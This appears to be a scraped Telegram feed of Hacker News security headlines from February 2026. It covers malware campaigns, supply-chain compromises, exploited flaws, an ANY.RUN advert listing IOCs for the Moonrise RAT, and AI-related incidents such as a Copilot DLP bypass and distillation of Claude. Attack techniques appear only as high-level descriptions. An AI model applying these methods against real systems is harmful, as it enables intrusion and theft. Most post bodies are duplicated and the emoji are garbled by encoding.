Three former tech employees were indicted for allegedly stealing Google trade secrets and transferring them to Iran.
Prosecutors say the data involved Pixel Tensor processor security and cryptography. Files were copied, photographed, and concealed.
π Details β https://thehackernews.com/2026/02/three-former-google-engineers-indicted.html
Prosecutors say the data involved Pixel Tensor processor security and cryptography. Files were copied, photographed, and concealed.
π Details β https://thehackernews.com/2026/02/three-former-google-engineers-indicted.html
π€20π10π€―8β‘2π₯2
The FBI warns ATM βjackpottingβ caused over $20M in losses in 2025.
Since 2020, 1,900 incidents have been reported, including 700 last year. Attackers use #malware like Ploutus to bypass bank authorization via the XFS layer & trigger rapid cash-outs.
π Read β https://thehackernews.com/2026/02/fbi-reports-1900-atm-jackpotting.html
Since 2020, 1,900 incidents have been reported, including 700 last year. Attackers use #malware like Ploutus to bypass bank authorization via the XFS layer & trigger rapid cash-outs.
π Read β https://thehackernews.com/2026/02/fbi-reports-1900-atm-jackpotting.html
π23π8π±5
A 29-year-old Ukrainian was sentenced to prison for aiding North Koreaβs IT job fraud scheme.
He admitted selling stolen U.S. identities through a site seized in 2024, helping overseas workers secure jobs.
π Details β https://thehackernews.com/2026/02/ukrainian-national-sentenced-to-5-years.html
He admitted selling stolen U.S. identities through a site seized in 2024, helping overseas workers secure jobs.
π Details β https://thehackernews.com/2026/02/ukrainian-national-sentenced-to-5-years.html
π15π€―6
π‘οΈ One in three cyber-attacks starts with a compromised employee account, pushing insurers to π audit passwords, admin access, and full MFA enforcement.
Coverage now depends on proving identity risk is tightly controlled.
π Why MFA gaps can cost millions β https://thehackernews.com/2026/02/identity-cyber-scores-new-metric.html
Coverage now depends on proving identity risk is tightly controlled.
π Why MFA gaps can cost millions β https://thehackernews.com/2026/02/identity-cyber-scores-new-metric.html
π12
MIMICRAT, a new RAT, is spreading via compromised legitimate sites.
Hijacked services displayed fake Cloudflare checks, pushing a PowerShell command that disables logging and AV, then connects over HTTPS masked as analytics traffic.
π Loader stages and 22-command toolkit β https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html
Hijacked services displayed fake Cloudflare checks, pushing a PowerShell command that disables logging and AV, then connects over HTTPS masked as analytics traffic.
π Loader stages and 22-command toolkit β https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html
π12β‘1
β οΈ WARNING: Cline CLI was silently altered for 8 hours after a stolen npm token was used to publish v2.3.0 with a hidden postinstall script that installed OpenClaw.
Roughly 4,000 downloads occurred before the release was pulled & the token revoked.
π Read β https://thehackernews.com/2026/02/cline-cli-230-supply-chain-attack.html
Roughly 4,000 downloads occurred before the release was pulled & the token revoked.
π Read β https://thehackernews.com/2026/02/cline-cli-230-supply-chain-attack.html
π±12π9π€4
β οΈ A 9.9-rated Roundcube RCE flaw is now on CISAβs KEV list after confirmed active exploitation.
Researchers say attackers diffed and weaponized the bug within 48 hours. An exploit was reportedly offered for sale in June 2025.
The issue lived in the code for more than 10 years.
A second XSS flaw is also being abused.
π Read β https://thehackernews.com/2026/02/cisa-adds-two-actively-exploited.html
Researchers say attackers diffed and weaponized the bug within 48 hours. An exploit was reportedly offered for sale in June 2025.
The issue lived in the code for more than 10 years.
A second XSS flaw is also being abused.
π Read β https://thehackernews.com/2026/02/cisa-adds-two-actively-exploited.html
π7π€―3
π₯ Anthropic is rolling out Claude Code Security, an AI tool that scans full codebases and suggests patches.
In limited preview for Enterprise and Team users, it analyzes code like a human, traces data flows, and reduces false positives in a review dashboard.
All fixes require human approval.
π Learn how it works β https://thehackernews.com/2026/02/anthropic-launches-claude-code-security.html
In limited preview for Enterprise and Team users, it analyzes code like a human, traces data flows, and reduces false positives in a review dashboard.
All fixes require human approval.
π Learn how it works β https://thehackernews.com/2026/02/anthropic-launches-claude-code-security.html
π₯29π9π±7π4π€3π€―1
Generative AI traffic is up 890%, and 87% of organizations report AI-driven attacks.
EC-Council has launched four AI certifications plus Certified CISO v4 to help teams handle adoption, security, and governance as AI risk grows.
π Framework and certification details β https://thehackernews.com/2026/02/ec-council-expands-ai-certification.html
EC-Council has launched four AI certifications plus Certified CISO v4 to help teams handle adoption, security, and governance as AI risk grows.
π Framework and certification details β https://thehackernews.com/2026/02/ec-council-expands-ai-certification.html
π15π₯3π3β‘1
π¨ A financially driven actor breached 600+ FortiGate devices across 55 countries using commercial AI.
No zero-days. They scanned exposed management ports, brute-forced weak logins, accessed VPNs, ran DCSync in AD, and targeted Veeam backups.
π Details here β https://thehackernews.com/2026/02/ai-assisted-threat-actor-compromises.html
No zero-days. They scanned exposed management ports, brute-forced weak logins, accessed VPNs, ran DCSync in AD, and targeted Veeam backups.
π Details here β https://thehackernews.com/2026/02/ai-assisted-threat-actor-compromises.html
π23π₯7β‘1
β‘ Android 17 beta blocks cleartext traffic by default.
Apps targeting 17+ must define a Network Security Configuration; usesCleartextTraffic="true" alone wonβt allow HTTP. Google also adds HPKE hybrid cryptography for stronger app communications.
π Read β https://thehackernews.com/2026/02/threatsday-bulletin-openssl-rce-foxit-0.html#privacy-model-hardening
Apps targeting 17+ must define a Network Security Configuration; usesCleartextTraffic="true" alone wonβt allow HTTP. Google also adds HPKE hybrid cryptography for stronger app communications.
π Read β https://thehackernews.com/2026/02/threatsday-bulletin-openssl-rce-foxit-0.html#privacy-model-hardening
π₯29π10π4
Iranβs MuddyWater launched Operation Olalampo on Jan 26, 2026, targeting organizations across MENA.
Group-IB says phishing Office macros drop new malwareβGhostFetch, GhostBackDoor, HTTP_VIP, and the Rust backdoor CHAR.
Some variants use Telegram for control, with signs of AI-assisted development.
π Read β https://thehackernews.com/2026/02/muddywater-targets-mena-organizations.html
Group-IB says phishing Office macros drop new malwareβGhostFetch, GhostBackDoor, HTTP_VIP, and the Rust backdoor CHAR.
Some variants use Telegram for control, with signs of AI-assisted development.
π Read β https://thehackernews.com/2026/02/muddywater-targets-mena-organizations.html
π₯12π6β‘2π1
Microsoft says a Copilot bug (CW1226324) let Microsoft 365 Copilot summarize confidential emails, bypassing DLP policies.
Since Jan 21, 2026, emails in Sent Items and Drafts with sensitivity labels were processed in Copilot Chat without permission.
Microsoft fixed the issue on Feb 3 but hasnβt disclosed impact.
π Details β https://thehackernews.com/2026/02/threatsday-bulletin-openssl-rce-foxit-0.html#copilot-bypassed-dlp-safeguards
Since Jan 21, 2026, emails in Sent Items and Drafts with sensitivity labels were processed in Copilot Chat without permission.
Microsoft fixed the issue on Feb 3 but hasnβt disclosed impact.
π Details β https://thehackernews.com/2026/02/threatsday-bulletin-openssl-rce-foxit-0.html#copilot-bypassed-dlp-safeguards
π21π€―8π4π±3
π€ Researchers found 19 malicious npm packages spreading SANDWORM_MODE.
The worm π steals npm/GitHub tokens, SSH keys, API secrets, and crypto keys, then propagates using stolen identities. It also injects into AI coding tools to harvest LLM API keys.
π Read β https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html
The worm π steals npm/GitHub tokens, SSH keys, API secrets, and crypto keys, then propagates using stolen identities. It also injects into AI coding tools to harvest LLM API keys.
π Read β https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html
π7π€4π1
β οΈ The real risk in enterprise AI isnβt the model β itβs the endpoint.
Every new LLM API, dashboard, or connector expands the attack surface. Many were built fast, not secure. Exposed endpoints can leak data or inherit powerful service account access.
π Why endpoint privilege now matters in LLM stacks β https://thehackernews.com/2026/02/how-exposed-endpoints-increase-risk.html
Every new LLM API, dashboard, or connector expands the attack surface. Many were built fast, not secure. Exposed endpoints can leak data or inherit powerful service account access.
π Why endpoint privilege now matters in LLM stacks β https://thehackernews.com/2026/02/how-exposed-endpoints-increase-risk.html
π₯7π3
The threat curve keeps climbing.
π Store skimmers
π§ WP RAT chains
π 508 ICS alerts
π 30Tbps DDoS
π€ Bot surge
π¦ 2.5K Docker malware
π’ 1T scam ads
π° NPM gambling backdoor
π± Samsung fingerprinting
βοΈ Teams spoof shield
π Full Weekly Recap live: https://thehackernews.com/2026/02/weekly-recap-double-tap-skimmers.html
π Store skimmers
π§ WP RAT chains
π 508 ICS alerts
π 30Tbps DDoS
π€ Bot surge
π¦ 2.5K Docker malware
π’ 1T scam ads
π° NPM gambling backdoor
π± Samsung fingerprinting
βοΈ Teams spoof shield
π Full Weekly Recap live: https://thehackernews.com/2026/02/weekly-recap-double-tap-skimmers.html
π5
π¨ WARNING: A new Go-based RAT, #Moonrise, evades AVs and escalates from one infected endpoint to network-wide compromise.
The impact includes credential theft and hidden audio/video surveillance.
Protect your company with strong early detection: https://thn.news/enterprise-sec
The impact includes credential theft and hidden audio/video surveillance.
Protect your company with strong early detection: https://thn.news/enterprise-sec
any.run
Enterprise Security Solutions to Boost SOC Performance with ANY.RUN
Enterprise companies cut costs, speed up investigations, and prevent breaches with ANY.RUNβs malware analysis and threat intelligence, trusted by 15K+ orgs
π4
Forwarded from ANY.RUN
π¨ Update Your Detection Rules: New Remote Access Trojan
We caught a Go-based RAT and named it #Moonrise. At the time of the analysis, the sample had not yet been submitted to VirusTotal βοΈ
The level of access enables credential harvesting, sensitive data collection, and preparation for further compromise without triggering static detections, leaving SOCs with no clear signals to act on.
β οΈ Observed capabilities include:
πΉ Privilege-related functions and persistence mechanisms
πΉ Data theft and credential harvesting
πΉ Process control and command execution
πΉ File upload and execution
πΉ User activity monitoring: screen capture and streaming, webcam and microphone access, keystroke logging, clipboard monitoring
One compromised endpoint can disrupt operations and lead to financial and reputational damage.
πΎ See sample execution in a live analysis session
β Behavior-first triage in #ANYRUN Sandbox lets security teams confirm attacker actions, like remote command execution, UAC bypass attempts, and persistence-related activity, within minutes. Security teams reduce Tier-1 overload and unnecessary escalations, while containing incidents earlier.
π¨βπ» Equip your SOC with faster decisions and lower workload. See how ANY.RUN fits your workflows
#ExploreWithANYRUN
IOCs:
193[.]23[.]199[.]88
c7fd265b23b2255729eed688a211f8c3bd2192834c00e4959d1f17a0b697cd5e
8a422b8c4c6f9a183848f8d3d95ace69abb870549b593c080946eaed9e5457ad
7609c7ab10f9ecc08824db6e3c3fa5cbdd0dff2555276e216abe9eebfb80f59b
Ed5471d42bef6b32253e9c1aba49b01b8282fd096ad0957abcf1a1e27e8f7551
082fdd964976afa6f9c5d8239f74990b24df3dfa0c95329c6e9f75d33681b9f4
8d7c1bbdb6a8bf074db7fc1185ffd59af0faffb08e0eb46a373c948147787268
We caught a Go-based RAT and named it #Moonrise. At the time of the analysis, the sample had not yet been submitted to VirusTotal βοΈ
The level of access enables credential harvesting, sensitive data collection, and preparation for further compromise without triggering static detections, leaving SOCs with no clear signals to act on.
β οΈ Observed capabilities include:
πΉ Privilege-related functions and persistence mechanisms
πΉ Data theft and credential harvesting
πΉ Process control and command execution
πΉ File upload and execution
πΉ User activity monitoring: screen capture and streaming, webcam and microphone access, keystroke logging, clipboard monitoring
One compromised endpoint can disrupt operations and lead to financial and reputational damage.
πΎ See sample execution in a live analysis session
β Behavior-first triage in #ANYRUN Sandbox lets security teams confirm attacker actions, like remote command execution, UAC bypass attempts, and persistence-related activity, within minutes. Security teams reduce Tier-1 overload and unnecessary escalations, while containing incidents earlier.
π¨βπ» Equip your SOC with faster decisions and lower workload. See how ANY.RUN fits your workflows
#ExploreWithANYRUN
IOCs:
193[.]23[.]199[.]88
c7fd265b23b2255729eed688a211f8c3bd2192834c00e4959d1f17a0b697cd5e
8a422b8c4c6f9a183848f8d3d95ace69abb870549b593c080946eaed9e5457ad
7609c7ab10f9ecc08824db6e3c3fa5cbdd0dff2555276e216abe9eebfb80f59b
Ed5471d42bef6b32253e9c1aba49b01b8282fd096ad0957abcf1a1e27e8f7551
082fdd964976afa6f9c5d8239f74990b24df3dfa0c95329c6e9f75d33681b9f4
8d7c1bbdb6a8bf074db7fc1185ffd59af0faffb08e0eb46a373c948147787268
π15
β οΈ Researchers uncovered a cryptojacking campaign hiding in pirated software bundles π΄ββ οΈ It drops a custom XMRig miner and abuses a flawed driver (CVE-2020-14979) to boost hashrate by 15β50%.
It can spread via USB drives, even into air-gapped systems.
π Details β https://thehackernews.com/2026/02/wormable-xmrig-campaign-uses-byovd.html
It can spread via USB drives, even into air-gapped systems.
π Details β https://thehackernews.com/2026/02/wormable-xmrig-campaign-uses-byovd.html
π₯11π6π1
Russia-linked APT28 ran a campaign across Europe from Sept 2025 to Jan 2026.
A Word doc acted as a silent beacon β opening it pinged a webhook, confirming the target engaged ππ‘ From there, basic VBScript and batch files set persistence and funneled command output back via Edge.
πRead β https://thehackernews.com/2026/02/apt28-targeted-european-entities-using.html
A Word doc acted as a silent beacon β opening it pinged a webhook, confirming the target engaged ππ‘ From there, basic VBScript and batch files set persistence and funneled command output back via Edge.
πRead β https://thehackernews.com/2026/02/apt28-targeted-european-entities-using.html
π8π₯7π€―4
β οΈ Anthropic says it blocked 16 million+ exchanges tied to model distillation campaigns targeting Claude.
The activity used 24,000 fake accounts and proxy networks to extract coding, reasoning, and tool-use capabilities. Three China-based AI labs were attributed.
Anthropic warns stripped safeguards could pose national security risks.
π Read β https://thehackernews.com/2026/02/anthropic-says-chinese-ai-firms-used-16.html
The activity used 24,000 fake accounts and proxy networks to extract coding, reasoning, and tool-use capabilities. Three China-based AI labs were attributed.
Anthropic warns stripped safeguards could pose national security risks.
π Read β https://thehackernews.com/2026/02/anthropic-says-chinese-ai-firms-used-16.html
π15π₯7π€3